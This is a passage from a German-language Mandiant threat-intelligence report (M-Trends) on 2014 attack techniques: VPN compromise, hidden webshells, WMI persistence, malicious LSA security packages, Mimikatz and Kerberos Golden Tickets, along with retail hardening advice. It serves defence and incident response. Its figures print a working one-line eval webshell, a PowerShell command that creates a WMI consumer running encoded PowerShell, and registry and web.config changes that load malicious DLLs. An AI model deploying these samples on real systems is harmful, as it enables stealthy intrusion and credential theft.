Zugriffsmethoden auf Zwei-Faktor-Authentifizierung um. Durchsuchen Sie die Logdateien für den Fernzugriff kontinuierlich nach Anzeichen verdächtiger Aktivitäten. Sicherer Zugang zur PCI- DSS-Umgebung Schotten Sie Ihre Umgebung für Zahlungen gemäß dem Payment Card Industry Data Security Standard (PCI DSS) vom Rest Ihres Intranets ab. Der Zugang zu Systemen in der PCI-DSS- Umgebung sollte nur über einen von einem siche ren Jumpserver kontrollierten Tunnel möglich sein. Damit befinden sich Ihre POS- Terminals effektiv in einem Hochsicherheitsbereich. Der Zugriff auf den Jumpserver sollte mit Zwei-Faktor-Authentifzierung gesichert sein. Trennen Sie die Verkaufsdomäne nach Möglichkeit vom Rest des Intranets ab, um die Anzahl der möglichen Einfallstore für diese Domäne zu minimieren. Als zusätzliche Sicherheitsmaßnahme sollte der Aufbau von Netzwerkverbindungen aus der Verkaufsdomäne auf Verbindungen zu einer genehmigten Liste geprüfter IP- Adressen beschränkt werden, die für den Geschäftsablauf erforderlich sind. Whitelist von Anwendungen für kritische Ressourcen Um das Risiko einer Malware-Infektion sicherheitskritischer Systeme zu minimieren, sollten auf diesen Systemen nur Anwendungen ausgeführt werden dürfen, die sich auf einer Whitelist geprüfter und genehmigter Anwendungen befinden. Als sicherheitskritisch sollten alle Jumpserver, Domänencontroller und sämtliche Systeme gelten, auf denen Kreditkartendaten verarbeitet werden. Management privilegierter Konten Privilegierte Konten sind für Angreifer besonders interessant, darunter das des Systemadministrators und des Domänenadministrators sowie Dienstkonten. Halten Sie die Anzahl privilegierter Konten so niedrig wie möglich. Sorgen Sie dafür, dass die Systemadministratorkonten für verschiedene Systeme unterschiedliche Kennwörter haben. Erwägen Sie den Einsatz einer Kennwortverwaltung zur Unterstützung Ihrer Systemadministratoren bei der Verwaltung zahlreicher verschiedener Kennwörter. Manche dieser Tools können Kennwörter automatisch nach jeder Nutzung ändern, um das Knacken privilegierter Konten zusätzlich zu erschweren. Fazit : Wo Geld ist, sind auch Kriminelle nicht weit. Einzelhändler gehören schon seit Langem zu den bevorzugten Zielen von Internetkriminellen. Daran hat sich auch 2014 nichts geändert. Die Angreifer nutzten zwar einige neue Angriffsma schen und das Medieninteresse an ihren Aktivitäten stieg, doch ihr Modus Operandi hat sich im Vergleich zu den Vorjahren nicht grundlegend geändert. 12

15 Trend Nr. 3: Raffiniertere Angriffsabläufe Die meisten von uns untersuchten Vorfälle folgen demselben Schema. Wir nennen dies den Lebenszyklus eines Angriffs. Es ist eine Art Wettrüsten: Sicherheitsteams implementieren neue Sicherheitsmaßnahmen und Angreifer finden Wege, um diese Maßnahmen zu umgehen. Das blieb auch 2014 so. Wir untersuchten mehr Vorfälle, bei denen Angreifer das VPN des Opfers hackten, um sich dauerhaften Zugang zu seiner Infrastruktur zu verschaffen. Zudem beobachteten wir clevere neue Tricks, um unentdeckt zu bleiben, sowie neue Tools und Methoden zum Stehlen von Anmeldedaten und Ausspionieren gehackter Umgebungen. Hacken von VPN Ein Hacker, der sich Zugriff auf das VPN seines Opfers verschaffen kann, hat zwei große Vorteile. Erstens hat er dadurch dauerhaft Zugang zur gehackten Infrastruktur, ohne Backdoors einrichten zu müssen. Zweitens kann er privile gierte Nutzer nachahmen, um unauffällig zu bleiben. Wir hatten bereits in früheren Jahren beobachtet, dass manche Angreifergruppen gezielt VPN- Ressourcen und -Anmeldedaten ins Visier nehmen, sobald sie in ein Netzwerk eingedrungen sind. Doch 2014 wurde ein neuer Rekord gesetzt: Wir sahen mehr Fälle, in denen Angreifer Zugang zum VPN ihres Opfer erlangten, als je zuvor. Bei den meisten dieser Angriffe wurde eine der folgenden beiden Methoden genutzt: Ein-Faktor-Authentifizierung: Wo nur ein Benutzername und Kennwort erforderlich waren, um auf das VPN zuzugreifen, nutzten die Angreifer Anmeldedaten, die sie von einem gehackten Computer oder der gehackten Active-Directory-Domain gestohlen hatten. Zertifikatsbasierte Zwei-Faktor-Authentifizierung: Wo das VPN des Opfers ein benutzerspezifisches digitales Zertifikat als zweiten Authentifizierungsfaktor verlangte, nutzten Angreifer gängige Tools wie Mimikatz, um diese Zertifikate von gehackten Benutzercomputern zu extrahieren. In einigen Fällen gelang es den Angreifern auch, VPN-Zertifikate abzufangen, die über unsichere Kommunikationskanäle an ihre legitimen Eigentümer geschickt wurden, beispielsweise als Anhang einer unver schlüsselten oder über eine offene Netzwerkfreigabe. In seltenen Fällen nutzten Angreifer Methoden, mit denen die VPN-Authentifizierung komplett umgangen werden konnte. Ein solches Beispiel war Heartbleed, eine Schwachstelle in der Erweiterung Heartbeat des Protokolls Transport Layer Security (TLS), die im April 2014 Schlagzeilen machte. Angreifer konnten betroffene Systeme und Geräte dazu bringen, bei jeder Abfrage bis zu 64 Kilobyte Daten aus dem Systemspeicher preiszugeben. Forscher bezweifelten zunächst, dass mit dieser Methode tatsächlich sensible Daten wie Verschlüsselungsschlüssel oder Anmeldedaten von echten Systemen gestohlen werden konnten. Die schlimmsten Befürchtungen erwiesen sich jedoch als zutreffend. Wenige Wochen nach Bekanntwerden von Heartbleed untersuchten wir einen Fall, in dem der Angreifer diese Schwachstelle in einem VPN-Gerät ausnutzte, um die authentifizierten Sitzungen autorisierter Nutzer zu übernehmen und sich völlig ohne Anmeldedaten Zugang zum VPN zu verschaffen. In den folgenden Wochen nutzten Angreifer Heartbleed, um in die VPN-Infrastrukturen weiterer Opfer einzudringen. Bessere Tarnung für Malware Die Malwareerkennung ist mit einem ständigen Wettrüsten zwischen Angreifern und Verteidigern vergleichbar. Das bestätigte sich auch 2014 wieder. Angreifer fanden mehrere neue Methoden, um ihre Aktionen zu verschleiern und Malware auf infizierten Systemen zu verbergen. 13

16 M-Trends Ein Bericht von der Cyberfront Wenn Schutzmaßnahmen weiterentwickelt werden, passen Angreifer sich an und finden neue Angriffsmethoden. Im Jahr 2014 beobachteten wir auf jeder Etappe des Angriffs-Lebenszyklus neue Methoden. Im Folgenden stellen wir einige der Ergebnisse vor. Hacken von VPN Mandiant beobachtete 2014 eine Rekordzahl von Fällen, in denen Angreifer sich Zugang zum VPN ihres Opfers verschafften. Verstecken von Webshells Angreifer fanden auch 2014 wieder neue Maschen zum Einschleusen und Verstecken webbasierter Malware. Unter den von Mandiant beobachteten Methoden waren: Installieren schädlicher Shells auf Servern mit SSL-Verschlüsselung, um die Netzwerküberwachung zu umgehen, Einbetten einer einzigen Shellcode-Zeile mit dem Kommando eval in eine seriöse Website, Ändern von Serverkonfigurationsdateien zum Laden schädlicher DLLs. Schädliche Sicherheitspakete Angreifer nutzten die Windows unentdeckt bleiben Security Package Extensibility aus, um Backdoors und Kennwortlogger zu installieren. Einsatz von WMI und Power- Shell Angreifer nutzen zunehmend WMI und PowerShell, zwei leistungsstarke Windows-Komponenten, um dauerhaft Zugang zu einer Infrastruktur zu erhalten, diese auszuspionieren und Daten zu stehlen. weitere Systeme infizieren Eindringen Fuß fassen Privilegien ausweiten Umgebung ausspionieren Ziel erreicht Unverschlüsselte Kennwörter Angreifer nutzten neu kompilierte Varianten des Tools Mimikatz, um unverschlüsselte Kennwörter aus dem Arbeitsspeicher zu stehlen, ohne von Antivirensoftware entdeckt zu werden. Kerberos-Angriffe Nachdem sie sich die Zugriffsrechte eines Domänenadministrators verschafft hatten, konnten Angreifer sich mit dem sogenannten Kerberos Golden Ticket Zugang zu beliebigen anderen privilegierten Konten verschaffen selbst nachdem alle Kennwörter in der Domäne geändert worden waren. Abbildung 4: Neue Angriffsmethoden, die Mandiant bei Untersuchungen beobachtete Bessere Verstecke für Webshells Webbasierte Backdoors, die sogenannten Webshells, sind ein mindestens zehn Jahre alter Malwaretyp. Dank neuer Methoden bleiben sie bei netzwerk- und hostbasierten Malwarescans unentdeckt und gehören weiterhin zu den bevorzugten Tools für gezielte Angriffe. In mehreren von uns untersuchten Fällen hatten Angreifer ihre Webshell auf einem Server mit SSL- Verschlüsselung (Secure Socket Layer) installiert. Dadurch wurden alle mit der Backdoor ausgetauschten Daten mit dem privaten Schlüssel des Servers verschlüsselt. Da die Opfer ihre Netzwerkarchitektur so konfiguriert hatten, dass ihre Sicherheitstools mit SSL verschlüsselte Daten nicht untersuchen konnten, wurden die Aktivitäten des Angreifers nicht erkannt. Wir gehen davon aus, dass diese Angriffsform in Zukunft häufiger genutzt werden wird, da die SSL- Verschlüsselung in immer mehr Unternehmen auf alle öffentlich zugänglichen Bereiche der Website ausgedehnt wird. In einer anderen von uns beobachteten Angriffsform wurde eine Shell in eine Webseite des Zielunternehmens eingeschleust. Diese Shell enthielt das Kommando eval, das per HTTP-Abfrage übermittelten Shellcode ausführt und damit hervorragend als Backdoor geeignet ist. Der Code für eine Shell mit dem Kommando eval kann weniger als 100 Byte lang sein und lässt sich daher leicht in einer größeren HTML-Datei verstecken. Auf normale HTTP-Abfragen reagiert die gehackte Webseite weiterhin wie zuvor. Doch wenn ein Angreifer die Seite mit dem richtigen Parameter aufruft, führt das Kommando eval den übermittelten schädlichen Code aus. Abbildung 5 zeigt den Code für eine Shell mit dem Kommando eval. Dies ist eine vollständige Shell, die so in einer eigenen Webseite implementiert oder in eine andere Website eingebettet werden könnte. Der Angreifer würde seinen schädlichen Code als Parameter p1 der HTTP-Abfrage übermitteln. 14

17 Als letztes Beispiel in diesem Abschnitt möchten wir Sie auf eine besonders raffinierte Masche für die webbasierte Übertragung von Malware aufmerksam machen: Die Angreifer änderten die Konfigurationsdatei web.config der Microsoft Internet Information Services (IIS) auf einem Webserver. Das veranlasste den Server, ein schädliches HTTP- Modul zu laden. Abbildung 6 zeigt eine editierte Version der Änderung in web.config. Mit dieser Änderung wird der Server angewiesen, die Bibliothek BadModule.dll aus einem Shared Modules Directory zu laden und zur Bearbeitung aller folgenden Webabfragen zu nutzen. Die Malware scannte und speicherte die Inhalte aller an den Server gerichteten Webabfragen, einschließlich aller von Benutzern übermittelten Anmeldedaten. Das in Abbildung 6 gezeigte Beispiel wurde von uns geändert. Der Angreifer gab dem schädlichen Modul den Namen einer echten Microsoft-DLL und änderte den Zeitstempel der Malware und der Konfigurationsdatei, um seine Spuren zu verwischen. Dauerhafter Zugang mit WMI Die Windows-Verwaltungsinstrumentation (Windows Management Instrumentation, WMI), eine Kernkomponente des Betriebssystems Windows, enthält ein breites Spektrum an Funktionen und Benutzer oberflächen für die Systemverwaltung. Anwendungen und Skriptsprachen wie PowerShell und VBScript können die WMI nutzen, um Daten zu erfassen, auf Komponenten auf den unteren Ebenen des Betriebssystems zuzugreifen und Befehle auszuführen. Darüber hinaus enthält die WMI ein Ereignisframework, das die Ausführung einer vom Benutzer angegebenen Anwendung veranlassen kann, wenn der Status eines bestimmten Objekts sich ändert. Anstelle einer seriösen Anwendung ließen die von uns beobachteten Angreifer Malware ausführen. In vergangenen Jahren hatten wir nur wenige WMIbasierte Angriffe beobachtet. Das lag vermutlich daran, dass die Nutzung von WMI recht kompliziert ist und den meisten Angreifern einfachere Methoden ausreichten, um in einer gehackten Umgebung unentdeckt zu bleiben. Im Jahr 2014 beobachteten wir jedoch mehrere Angreifergruppen, die WMI für diesen Zweck einsetzten. Für die von uns beobachtete Methode erstellten die Angreifer drei WMI-Objekte, in der Regel mit PowerShell: Ereignisfilter: Der Filter ermittelt, ob ein bestimmtes, häufig auftretendes Ereignis eingetreten ist, beispielsweise eine bestimmte Tageszeit oder der Ablauf einer vorgegebenen Anzahl von Sekunden seit dem letzten Systemstart. Ereignisempfänger: Der Empfänger führt ein bestimmtes Skript bzw. einen bestimmten Befehl aus, wenn das Ereignis eintritt. Die meisten der von uns beobachteten Angreifer erstellten befehlszeilenbasierte Ereignisempfänger, die beliebige Befehle und Argumente ausführen konnten, oder auf Active Script basierende Ereignisempfänger, die VBS- Skripte ausführten. Verbindung zwischen Filter und Empfänger: Die Verbindung sorgt dafür, dass ein bestimmter Empfänger aufgerufen wird, wenn das in einem Filter spezifizierte Ereignis eintritt. Abbildung 8 zeigt ein Beispiel für einen PowerShell- Befehl, der einen befehlszeilenbasierten Ereignisempfänger erstellt. Dieser Empfänger führt powershell.exe mit einem in Base64-codierten String als Argument aus. <%@ Page Language= Jscript %><%eval(request.item[ p1 ], unsafe );%> Abbildung 5: Beispiel einer Webshell mit eval <!--HTTP Modules --> <modules> <add type= Microsoft.Exchange.Clients.BadModule name= BadModule /> </modules> Abbildung 6: Auszug aus der gehackten Datei web.config 15

18 M-Trends Ein Bericht von der Cyberfront 1 Mit PowerShell-Befehlen erstellt der Angreifer drei Ereignisobjekte in WMI: einen Empfänger, der einen Befehl oder ein Skript ausführt, einen Filter, der das System auf eine häufig auftretende Situation überprüft, und eine Verbindung zwischen dem Filter und dem Empfänger. WMI-Namespace (root\subscription) Set-WmiInstance Ereignisempfänger Führe dieses Skript/ diesen Befehl aus Ereignisfilter Frage nach, ob dieses Ereignis eingetreten ist Verbindung zwischen Filter und Empfänger Nutze diesen Filter, um den Empfänger aufzurufen. WMI testet regelmäßig, ob das im Ereignisfilter spezifizierte Ereignis eingetreten ist. In 2 diesem Beispiel wird die Bedingung täglich um 8.05 Uhr erfüllt. SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60 3 Wenn das im Filter spezifizierte Ereignis eintritt, ruft WMI automatisch den mit diesem Filter verbundenen Ereignisempfänger auf. Das Beispiel zeigt einen Teil eines befehlszeilenbasierten Ereignisempfängers, der PowerShell mit zusätzlicher Malware ausführt, die vom Angreifer als Base64-codierter Parameter bereitgestellt wird. CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe NonInteractive enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..." Abbildung 7: So verschafften Angreifer sich mit WMI dauerhaften Zugriff 16

19 Der String könnte zusätzlichen PowerShell-Code enthalten, beispielsweise ein einfaches Download- Tool oder eine Backdoor, und den Angreifern so das Installieren einer Skriptdatei auf der Festplatte ersparen. Wenn dieser Empfänger mit einem geeigneten Ereignisfilter verbunden wäre, könnte er wiederholt ausgeführt werden. WMI-basierte Methoden für den langfristigen Zugriff auf eine gehackte Infrastruktur sind bei einer forensischen Analyse nur schwer zu erkennen, da die Angreifer Ereignisfilter und -empfänger auf eine m System definieren und diese mithilfe von PowerShell-Befehlen auf demselben oder einem anderen System ausführen können. Im Gegensatz zu vielen anderen Methoden für den Erhalt eines dauerhaften Zugriffs hinterlässt dies auch keine Spuren in der Registry. Die Objekte befinden sich im WMI-Repository objects.data, einer komplexen Datenbank auf der Festplatte, die sich nicht leicht auf schädliche Objekte durchsuchen lässt. Darüber hinaus überprüft Windows neu erstellte oder aktivierte Ereignisfilter und -empfänger nur, wenn die Protokollierung auf der Debug-Ebene aktiviert ist. Dabei wird jedoch eine so hohe Anzahl von Ereignissen aufgezeichnet, dass dies nicht die Standardoption ist und die langfristige Nutzung nicht empfohlen wird. 5 Schädliche Sicherheitsmodule Wir haben mehrere Fälle untersucht, in denen Angreifer Sicherheitsmodule in der lokalen Sicherheitsautorität (Windows Local Security Authority, LSA) ausnutzten, um automatisch und unbemerkt Malware herunterzuladen. Sicher heitsmodule sind DLL-Dateien, die unter ver schiedenen Werten unter dem Registrierungs schlüssel HKLM\SYSTEM\ CurrentControlSet\Control\Lsa konfiguriert und beim Systemstart von der LSA geladen werden. Jeder dieser Werte enthält eine Liste von Dateinamen (ohne die Dateierweiterung), die von %SYSTEM- ROOT%\system32\ zu laden sind. Da LSA-Module automatisch von LSASS.EXE geladen werden, kann ein Angreifer mit Administratorrechten diese Liste erweitern oder ändern, um bei jedem Systemstart schädliche DLLs zu laden. In einem von uns 2014 untersuchten Fall änderte der Angreifer den Wert von Security Packages, um sicherzustellen, dass das zum Herunterladen genutzte Tool der aus mehreren Komponenten bestehenden Backdoor tspkgex.dll auf dem System verblieb. 6 Abbildung 9 zeigt den geänderten Wert. Diese Änderung veranlasst LSASS.EXE, bei jedem Systemstart C:\WINDOWS\system32\tspkgEx.dll zu laden. Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer name= EvilWMI ;CommandLineTemplate= C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe enc SQBuAHYAbwBrAGUALQBDAG8AG8AbQ...<SNIP> ;RunInteractively= false } Abbildung 8: Auszug aus einem PowerShell-Befehl zum Erstellen eines WMI-Empfängers SECURITY PACKAGES (unverändert): kerberos msv1_0 schannel wdigest tspkg pku2u SECURITY PACKAGES (geändert): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgex Abbildung 9: Geänderte HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages, die Malware lädt 5 Auf der Mandiant-Konferenz MIRcon 2014 wurden Vorträge zu den Themen WMI und PowerShell gehalten, die diese Methoden ausführlicher beschrieben. Die Vorträge enthielten Fallstudien und Ratschläge für das Aufdecken und die forensische Analyse. Die Präsentationen sind unter mandiant.com/ee/library/mircon2014/mircon_2014_ir_track_there%27s_something_about_wmi.pdf und verfügbar. 6 DLL-Name von uns geändert. 17

20 M-Trends Ein Bericht von der Cyberfront In fast allen von uns untersuchten Fällen wurde Mimikatz von der Antivirensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist. Die meisten Angreifer änderten den Quellcode leicht oder kompilierten ihn einfach nur neu, um Antivirensoftware zu umgehen. Da LSA erweiterbar ist, kann es auch um speziell erstell te Module erweitert werden, die beim Login die Anmeldedaten des Benutzers über prüfen. Ein schädliches Sicherheitsmodul kann diese Funktion missbrauchen, um bei Anmeldeversuchen unverschlüsselte Kennwörter abzufangen. Wir untersuchten 2014 einen gezielten Angriff, bei dem der Angreifer Malware für genau diesen Zweck als Sicherheitsmodul lud. Das weit verbreitete Toolkit Mimikatz 7 enthält ebenfalls ein Sicherheitsmodul zum Stehlen von Kennwörtern, mimilib.ssp. 8 Tools und Tricks für den Kennwortdiebstahl Tools zum Stehlen von Anmeldedaten sind auf dem Schwarzmarkt inzwischen so weit verbreitet, dass das Entwenden von Kennwörtern und das Erlangen von Zugriffsrechten in Windows-Umgebungen deutlich einfacher sind als früher. Bei gezielten Angriffen kam 2014 meist eine der beiden folgenden Methoden zum Einsatz: Pass the Hash, also die Anmeldung mit einem gestohlenen NTLM-Hashwert, ohne diesen zu knacken, Stehlen unverschlüsselter Kennwörter aus dem Arbeitsspeicher mit Mimikatz. In Windows Server 2012 R2 und Windows 8.1 hat Microsoft die Wirksamkeit dieser Methoden eingeschränkt, völlig unmöglich sind sie dadurch jedoch noch immer nicht. Die meisten Kunden, mit denen wir im vergangenen Jahr zusammenarbeiteten, nutzten außerdem noch Domänen mit Windows Server 2008 und Endpunkte mit Windows 7. Pass the Hash ist daher eine bewährte und weiterhin erfolg versprechende Methode, insbesondere wenn mehrere Systeme in einer Umgebung dasselbe Administratorkennwort haben. Mimikatz geht einen Schritt weiter: Es stiehlt unverschlüsselte Windows-Kennwörter, die vom System im Arbeitsspeicher abgelegt wurden, um verschiedene Formen von Single-Sign-On zu unterstützen. Auf dem Computer eines Mitarbeiters sind die Auswirkungen eines solchen Angriffs wahrscheinlich auf den Diebstahl des Domänenkennworts dieses Mitarbeiters begrenzt. Auf einem gemein sam genutzten Server, auf dem viele Benutzer sich mit dem Remote Desktop Protocol (RDP), dem Tool PsExec oder anderen Methoden interaktiv anmelden, könnten dagegen potenziell sehr viele Kennwörter gestohlen werden. Die Opfer eines solchen Angriffs sind meist überrascht, wie schnell ein Angreifer eine ganze Domäne in Active Directory unter seine Kontrolle bringen kann, nachdem er sich Zugang zu einigen wenigen Systemen verschafft hat. In fast allen von uns untersuchten Fällen wurde Mimikatz von der Antivirensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist. Die meisten Angreifer änderten den Quellcode leicht oder kompilierten ihn einfach nur neu, um Antivirensoftware zu umgehen. Manche nutzten auch Variationen wie das PowerShell-Skript Invoke-Mimikatz, das vollständig im Arbeitsspeicher ausgeführt werden kann. Außerdem beobachteten wir 2014 mehrere neue Angriffsmethoden, die auf den Authentifizierungsmechanismus Kerberos abzielten, der in modernen Windows-Domänen standardmäßig verwendet wird. Die Mimikatz-Masche Golden Ticket ist vielleicht die gefährlichste und berüchtigtste dieser Methoden. Mit ihr kann ein Angreifer, der einen Domänencontroller gehackt hat, ein Kerberos- Ticket erstellen, das das Zuweisen beliebiger Zugriffsrechte an andere Benutzer erlaubt Auf der Mandiant-Konferenz MIRcon 2014 präsentierte Matt Graeber weitere Untersuchungsergebnisse zu schädlichen Sicherheitsmodulen sowie Hinweise zu deren Aufdeckung und Abwehr. Diese Präsentation ist unter Analysis_of_Malicious_SSP.pdf verfügbar. 18